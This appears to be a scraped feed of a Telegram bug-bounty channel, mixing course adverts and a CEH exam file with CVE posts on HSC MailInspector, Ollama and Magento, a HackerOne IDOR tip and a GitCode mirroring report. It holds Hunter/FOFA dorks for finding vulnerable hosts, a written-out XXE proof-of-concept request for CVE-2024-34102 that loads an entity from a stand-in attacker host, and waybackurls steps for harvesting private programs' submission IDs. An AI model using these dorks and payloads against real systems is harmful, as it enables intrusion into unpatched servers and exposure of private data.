Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤🔥5🔥1
Hunter: web.noscript=="..:: HSC MailInspector ::.."
FOFA: noscript=="..:: HSC MailInspector ::.."
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
🚨CVE-2024-34470: Path Traversal vulnerability in HSC Mailinspector! #computersecurity #cybersec
🚨CVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector!👉An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2....
🔥4❤🔥1👍1
💥 Registration Open for July Batch: Extreme Web Application Penetration Testing 💥
⚠️ Slots Remaining 4
💯Registration Link: https://lnkd.in/g7MjfrXG
Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!
🖥 Starts: July Mid, 2024
ℹ️ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
⏸ Mode: Online | Language: English
🔗 Course Module: https://lnkd.in/gfZbBCFn
💯Registration Link: https://lnkd.in/g7MjfrXG
Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!
ℹ️ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
⏸ Mode: Online | Language: English
🔗 Course Module:
Please open Telegram to view this post
VIEW IN TELEGRAM
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
👍1
ceh-v12-exam-set.pdf
1.6 MB
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🤡5🤣2🐳1🤝1
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤🔥1
https://wa.me/message/NQLPOBIAEFDBN1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯1
Looking for someone who can contribute on the next 30 days Bug Bounty Challenge.
Similar to this https://nas.io/brutsecurity
Similar to this https://nas.io/brutsecurity
🚨CVE-2024-37032: Probllama—Ollama Remote Code Execution Vulnerability
⚠️The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.
🔥PoC: https://lnkd.in/gk6Wvq_P
💥Dorks:
Hunter: /product.name="Ollama Web"
FOFA: app="Ollama-Web"
⚠️The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.
🔥PoC: https://lnkd.in/gk6Wvq_P
💥Dorks:
Hunter: /product.name="Ollama Web"
FOFA: app="Ollama-Web"
🔥1
CVE-2024-34102 POC
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
👍8
IDOR on HackerOne Embedded Submission Form 💰 💲
-
Steps to reproduce (obtaining inactive UUID of many private programs)
1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
-
Steps to reproduce (obtaining inactive UUID of many private programs)
1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
HackerOne
HackerOne | Global leader in offensive security | Security for AI | Crowdsourced Security
HackerOne combines AI with the ingenuity of the largest community of security researchers to find and fix security, privacy, and AI vulnerabilities across the SDLC. HackerOne offers AI red teaming, crowdsourced security, bug bounty, vulnerability disclosure…
👍3
China now has their own GitHub/public Git repository hosting service called GitCode; it is owned and operated by CSDN under the company name "重庆开源共创科技有限公司"
It is being reported that many users' repository are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing.
tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.
Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA
#github #gitcode
It is being reported that many users' repository are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing.
tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.
Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA
#github #gitcode
🐳3👍1